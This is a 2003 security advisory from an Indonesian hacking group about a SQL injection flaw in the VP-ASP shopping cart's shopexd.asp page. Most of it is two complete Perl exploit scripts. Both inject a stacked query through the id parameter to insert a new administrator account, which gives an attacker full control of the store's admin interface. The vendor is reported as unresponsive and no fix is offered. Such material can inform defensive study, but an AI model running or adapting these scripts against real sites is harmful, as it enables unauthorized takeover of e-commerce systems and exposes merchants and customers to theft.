|
Advisory Name: VPASP SQL Injection Vulnerability & Exploit CODE Release Date: 05/07/2003 Application: 5 Platform: Win32/MSSQL Severity: High BUG Type: SQL Injection Discover by: AresU <aresu@bosen.net> & TioEuy <tioeuy@bosen.net> Author: Bosen <mobile@bosen.net> Vendor Status: See below. Vendor URL: http://www.vpasp.com/ Reference: http://bosen.net/releases/ Overview: VP-ASP is now in use in over 70 countries and has every major feature you would expect from an e-commerce solution. VP-ASP combines ease of use and powerful features with unlimited customization. more nice reading at http://www.vpasp.com itself. Details: Looking at vpasp source code, we found nice SQL Injection vuln. which is lies on shopexd.asp. Exploiting is not hard to do. Insert new user with admin priviledge can be done in a sec. Which is would couse full control to web based admin interface. Exploits/POC: by Bosen -------- #!/usr/bin/perl -w $pamer = " 1ndonesian Security Team (1st) ============================== tio-fux.pl, vpasp SQL Injection Proof of Concept Exploit by : Bosen & TioEuy Discover by : TioEuy, AresU Greetz to : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa, muthafuka all #hackers\@centrin.net.id/austnet.org http://bosen.net/releases/ "; # shut up ! we're the best in our country :) use LWP::UserAgent; # LWP Mode sorry im lazy :) use HTTP::Request; use HTTP::Response; $| = 1; print $pamer; if ($#ARGV<3){ print "\n Usage: perl tio-fux.pl <uri> <prod-id> <user> <password> \n\n"; exit; } my $biji = "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29"; $tio = "$ARGV[0]/shopexd.asp?id=$ARGV[1]"; $tio .= ";insert into tbluser (\"fldusername\",\"fldpassword\",\"fldaccess\") "; $tio .= "values ('$ARGV[2]','$ARGV[3]','$biji')--"; my $bosen = LWP::UserAgent->new(); my $gembel = HTTP::Request->new(GET => $tio); my $dodol = $bosen->request($gembel); if ($dodol->is_error()) { printf " %s\n", $dodol->status_line; } else { print "Tuing !\n"; } print "\n680165\n"; --END-- by Aresu -------- #!/usr/bin/perl # PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE # 1ndonesian Security Team (1st) # ============================== # VP-ASP Shopping Cart - Exploit # Discover by : TioEuy & AresU; # Greetz to: syzwz (ta for da ipod), Bosen, sakitjiwa, muthafuka all # hackers@centrin.net.id/austnet.org, #romance@centrin.net.id # http://bosen.net/releases/ use Socket; $dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU "; $aksesnya ="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29"; $pieldnya = '"fldusername","fldpassword","fldaccess"'; if ($#ARGV<4) { print "\n$dodolbasik"; print "\n\n Usage: perl tioeuy.pl <server> <full path> <id> <user> <password> \n\n"; exit; } $kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser ($pieldnya) values ('$ARGV[3]','$ARGV[4]','$aksesnya')--"; $kupret=~s/\ /%20/g; $kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n"; print $kupret; $port=80; $host=$ARGV[0]; $target = inet_aton($host); @hasil=sendraw($kupret); print $gembel; print @hasil; # ------------- Sendraw - thanx RFP rfp@wiretrip.net sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } } --END-- Vendor Response: Contacted. No response. Recommendation: No recommendation for this. 1ndonesian Security Team (1st) Advisory: http://bosen.net/releases/ About 1ndonesian Security Team: 1ndonesian Security Team, research and develop intelligent, advanced application security assessment. Based in Indonesia, 1ndonesian Security Team offers best of breed security consulting services, specialising in application, host and network security assessments. 1st provides security information and patches for use by the entire 1st community. This information is provided freely to all interested parties and may be redistributed provided that it is not altered in any way, 1st is appropriately credited and the document retains. Greetz to: Bosen, sakitjiwa, muthafuka, alphacentury, Gembul, syzwz, Heltz, TomIngShUu, riico, w4n, negative All 1ndonesian Security Team - #hackers@austnet.org/centrin.net.id AresU <aresu@bosen.net> ====================== Original document can be fount at http://www.bosen.net/releases/?id=41